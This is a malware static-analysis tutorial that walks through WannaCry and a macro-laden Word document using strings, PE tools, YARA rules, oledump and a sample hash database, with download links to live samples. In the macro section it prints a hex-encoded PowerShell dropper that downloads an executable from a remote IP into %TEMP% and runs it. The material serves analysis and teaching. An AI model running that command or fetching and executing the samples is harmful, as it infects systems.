joemccray

Static Analysis v2

Sep 30th, 2018
############################
# Download the Analysis VM #
############################
https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user: infosecaddicts
pass: infosecaddicts

- Log in to your Ubuntu system with the username 'infosecaddicts' and the password 'infosecaddicts'.

###################################
# Setting up your virtual machine #
###################################

Here is where we will set up all of the required dependencies for the tools we plan to install.
---------------------------Type This-----------------------------------
sudo apt update
sudo apt-get install -y python3-pip python3-dev unzip python3-setuptools ipython3 build-essential python-pefile python2.7 python-pip python-setuptools mysql-server python-mysqldb

sudo pip install -U olefile

git clone https://github.com/Te-k/pe.git
cd pe
sudo python3 setup.py install
pip3 install .
cd ..
wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
(the zip is password protected; the password is 'infected')
-----------------------------------------------------------------------
################
# The Scenario #
################
You've come across a file that has been flagged by one of your security products (AV quarantine, HIPS, spam filter, web proxy, or digital forensics scripts).

The fastest thing you can do is perform static analysis.

###################
# Static Analysis #
###################

- After logging in, please open a terminal window and type the following commands:

---------------------------Type This-----------------------------------
cd ~

mkdir static_analysis

cd static_analysis

wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip

unzip wannacry.zip
infected                     (password at the unzip prompt)

file wannacry.exe

mv wannacry.exe malware.pdf

file malware.pdf

mv malware.pdf wannacry.exe

hexdump -n 2 -C wannacry.exe
----------------------------------------------------------------------

***What is '4d 5a' or 'MZ'?***
Reference:
http://www.garykessler.net/library/file_sigs.html
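The same magic-byte check that `file` and the `hexdump -n 2` step perform, as an added Python example (not part of these notes): it identifies a file from its leading bytes with a small signature table and flags samples whose extension disagrees with the magic. The signature table and the sample bytes are constructed here; the reference list above has many more signatures.

```python
# Added example, not from the original notes: identify a file from its leading
# bytes, the way `file` and the hexdump step do, ignoring the extension.
import os
import tempfile

# Constructed table of a few well-known magic values (offset 0 in every case)
SIGNATURES = {
    b"MZ": "DOS/Windows executable (MZ header, PE/NE/DOS)",
    b"%PDF": "PDF document",
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "OLE2 compound document (legacy .doc/.xls)",
    b"PK\x03\x04": "ZIP archive (also .docx/.xlsx, JAR, APK)",
    b"\x7fELF": "ELF executable",
}
# What each extension claims to be, keyed to a word in the descriptions above
CLAIMS = {".exe": "MZ", ".dll": "MZ", ".pdf": "PDF", ".doc": "OLE2", ".docx": "ZIP"}

def identify_bytes(head):
    """Return the description for the magic at the start of `head`, or 'unknown'."""
    for magic in sorted(SIGNATURES, key=len, reverse=True):  # longest match first
        if head.startswith(magic):
            return SIGNATURES[magic]
    return "unknown"

def identify(path):
    with open(path, "rb") as fh:
        return identify_bytes(fh.read(16))

def extension_mismatch(path):
    """True when the extension promises one type and the magic says another."""
    ext = os.path.splitext(path)[1].lower()
    return ext in CLAIMS and CLAIMS[ext] not in identify(path)

def demo():
    """Constructed sample: an MZ stub (not real malware) saved as malware.pdf,
    mirroring the rename in the notes. Returns (description, mismatch flag)."""
    sample = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56
    path = os.path.join(tempfile.mkdtemp(), "malware.pdf")
    with open(path, "wb") as fh:
        fh.write(sample)
    return identify(path), extension_mismatch(path)

if __name__ == "__main__":
    print(demo())   # ('DOS/Windows executable (MZ header, PE/NE/DOS)', True)
```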

---------------------------Type This-----------------------------------
objdump -x wannacry.exe

strings wannacry.exe

strings wannacry.exe | grep -i dll

strings wannacry.exe | grep -i library

strings wannacry.exe | grep -i reg

strings wannacry.exe | grep -i key

strings wannacry.exe | grep -i rsa

strings wannacry.exe | grep -i open

strings wannacry.exe | grep -i get

strings wannacry.exe | grep -i mutex

strings wannacry.exe | grep -i irc

strings wannacry.exe | grep -i join

strings wannacry.exe | grep -i admin

strings wannacry.exe | grep -i list
----------------------------------------------------------------------

---------------------------Type This-----------------------------------
pe info wannacry.exe
pe check wannacry.exe
pe dump --section text wannacry.exe
pe dump --section data wannacry.exe
pe dump --section rdata wannacry.exe
pe dump --section rsrc wannacry.exe
pe dump --section reloc wannacry.exe
strings rdata | less
strings rsrc | less
strings text | less
----------------------------------------------------------------------

Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"

Quick Google search for "wannacry ransomware analysis"

Reference
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/

- Yara Rule -

Strings:
$s1 = "Ooops, your files have been encrypted!" wide ascii nocase
$s2 = "Wanna Decryptor" wide ascii nocase
$s3 = ".wcry" wide ascii nocase
$s4 = "WANNACRY" wide ascii nocase
$s5 = "WANACRY!" wide ascii nocase
$s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase

Ok, let's look for the individual strings

---------------------------Type This-----------------------------------
strings wannacry.exe | grep -i ooops

strings wannacry.exe | grep -i wanna

strings wannacry.exe | grep -i wcry

strings wannacry.exe | grep -i wannacry

strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
----------------------------------------------------------------------

Note that plain `strings` only extracts ASCII text. The rule's `wide` modifier also covers UTF-16LE strings, which grep never sees here; `strings -el wannacry.exe` lists those.

####################################
# Tired of GREP - let's try Python #
####################################
Decided to make my own script for this kind of stuff in the future. I

Reference1:
https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py

This is a really good script for the basics of static analysis.

Reference:
https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html

This report is really good for showing some good signatures to add to the Python script.

Here is my own script using the signatures (started this yesterday, but still needs work):
https://pastebin.com/guxzCBmP

---------------------------Type This-----------------------------------
wget https://pastebin.com/raw/guxzCBmP

mv guxzCBmP am.py

vi am.py

python2.7 am.py wannacry.exe
----------------------------------------------------------------------

##############
# Yara Ninja #
##############

Reference:
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/

----------------------------------------------------------------------------
rule wannacry_1 : ransom
{
    meta:
        author = "Joshua Cannell"
        description = "WannaCry Ransomware strings"
        weight = 100
        date = "2017-05-12"

    strings:
        $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
        $s2 = "Wanna Decryptor" wide ascii nocase
        $s3 = ".wcry" wide ascii nocase
        $s4 = "WANNACRY" wide ascii nocase
        $s5 = "WANACRY!" wide ascii nocase
        $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase

    condition:
        any of them
}
----------------------------------------------------------------------------
rule wannacry_2
{
    meta:
        author = "Harold Ogden"
        description = "WannaCry Ransomware Strings"
        date = "2017-05-12"
        weight = 100

    strings:
        $string1 = "msg/m_bulgarian.wnry"
        $string2 = "msg/m_chinese (simplified).wnry"
        $string3 = "msg/m_chinese (traditional).wnry"
        $string4 = "msg/m_croatian.wnry"
        $string5 = "msg/m_czech.wnry"
        $string6 = "msg/m_danish.wnry"
        $string7 = "msg/m_dutch.wnry"
        $string8 = "msg/m_english.wnry"
        $string9 = "msg/m_filipino.wnry"
        $string10 = "msg/m_finnish.wnry"
        $string11 = "msg/m_french.wnry"
        $string12 = "msg/m_german.wnry"
        $string13 = "msg/m_greek.wnry"
        $string14 = "msg/m_indonesian.wnry"
        $string15 = "msg/m_italian.wnry"
        $string16 = "msg/m_japanese.wnry"
        $string17 = "msg/m_korean.wnry"
        $string18 = "msg/m_latvian.wnry"
        $string19 = "msg/m_norwegian.wnry"
        $string20 = "msg/m_polish.wnry"
        $string21 = "msg/m_portuguese.wnry"
        $string22 = "msg/m_romanian.wnry"
        $string23 = "msg/m_russian.wnry"
        $string24 = "msg/m_slovak.wnry"
        $string25 = "msg/m_spanish.wnry"
        $string26 = "msg/m_swedish.wnry"
        $string27 = "msg/m_turkish.wnry"
        $string28 = "msg/m_vietnamese.wnry"

    condition:
        any of ($string*)
}
----------------------------------------------------------------------------

####################################
# Analyzing Macro Embedded Malware #
####################################
---------------------------Type This-----------------------------------
mkdir ~/oledump

cd ~/oledump

wget http://didierstevens.com/files/software/oledump_V0_0_22.zip

unzip oledump_V0_0_22.zip

wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip

unzip 064016.zip
infected                     (password at the unzip prompt)

python oledump.py 064016.doc

python oledump.py 064016.doc -s A4 -v
-----------------------------------------------------------------------

- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
- Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.

---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A5 -v
-----------------------------------------------------------------------

- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.

---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A3 -v
-----------------------------------------------------------------------

- Look for "GVhkjbjv" and you should see:

636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B

- Take that long blob that starts with 636D and finishes with 653B and paste it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm
-----------------------------------------------------------------------

###############################
# Creating a Malware Database #
###############################
Creating a malware database (mysql)
-----------------------------------
- Step 1: Logging in
Run the following command in the terminal:
---------------------------Type This-----------------------------------
mysql -u root -p             (set a password of 'malware')

- Then create one database by running the following command:

create database malware;

exit;

wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py

vi mal_to_db.py              (fill in the database connection information)

python mal_to_db.py -i

------- check to see if the files table was created ------

mysql -u root -p
malware

show databases;

use malware;

show tables;

describe files;

exit;

---------------------------------

- Now add the malicious file to the DB
---------------------------Type This-----------------------------------
python mal_to_db.py -f wannacry.exe -u
-----------------------------------------------------------------------

- Now check to see if it is in the DB
---------------------------Type This-----------------------------------
mysql -u root -p
malware

mysql> use malware;

mysql> select id,md5,sha1,sha256,time FROM files;

mysql> quit;
-----------------------------------------------------------------------
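mal_to_db.py needs the MySQL setup above. As an added stand-alone example (not mal_to_db.py), here is the same files table with the columns the final SELECT queries (id, md5, sha1, sha256, time) built on Python's bundled sqlite3, with a uniqueness constraint on sha256 so resubmitting a sample does not create a duplicate row. The schema is an assumption modelled on that SELECT, and the sample bytes in the test are constructed.

```python
# Added example, not mal_to_db.py: a files table with the columns the notes
# query (id, md5, sha1, sha256, time) on sqlite3, so it runs without MySQL.
# The schema is assumed from that SELECT; the real tool's table may differ.
import hashlib
import sqlite3
import sys
from datetime import datetime, timezone

SCHEMA = """
CREATE TABLE IF NOT EXISTS files (
    id     INTEGER PRIMARY KEY AUTOINCREMENT,
    name   TEXT NOT NULL,
    md5    TEXT NOT NULL,
    sha1   TEXT NOT NULL,
    sha256 TEXT NOT NULL UNIQUE,   -- one row per distinct sample
    time   TEXT NOT NULL
)
"""

def hash_bytes(data):
    """md5, sha1 and sha256 hex digests of a sample."""
    return {n: hashlib.new(n, data).hexdigest() for n in ("md5", "sha1", "sha256")}

def open_db(path=":memory:"):
    con = sqlite3.connect(path)
    con.execute(SCHEMA)
    return con

def add_sample(con, name, data):
    """Record a sample. Returns True for a new row, False when the sha256
    is already known (the insert is ignored rather than duplicated)."""
    h = hash_bytes(data)
    cur = con.execute(
        "INSERT OR IGNORE INTO files (name, md5, sha1, sha256, time) VALUES (?,?,?,?,?)",
        (name, h["md5"], h["sha1"], h["sha256"], datetime.now(timezone.utc).isoformat()),
    )
    con.commit()
    return cur.rowcount == 1

def lookup(con, sha256):
    """Row (id, name, md5, sha1, sha256, time) for a known hash, or None."""
    return con.execute(
        "SELECT id, name, md5, sha1, sha256, time FROM files WHERE sha256 = ?", (sha256,)
    ).fetchone()

if __name__ == "__main__":
    # Usage: python this_script.py <sample>   (stores the hashes in malware.db)
    con = open_db("malware.db")
    with open(sys.argv[1], "rb") as fh:
        data = fh.read()
    print("new" if add_sample(con, sys.argv[1], data) else "already known",
          lookup(con, hash_bytes(data)["sha256"]))
```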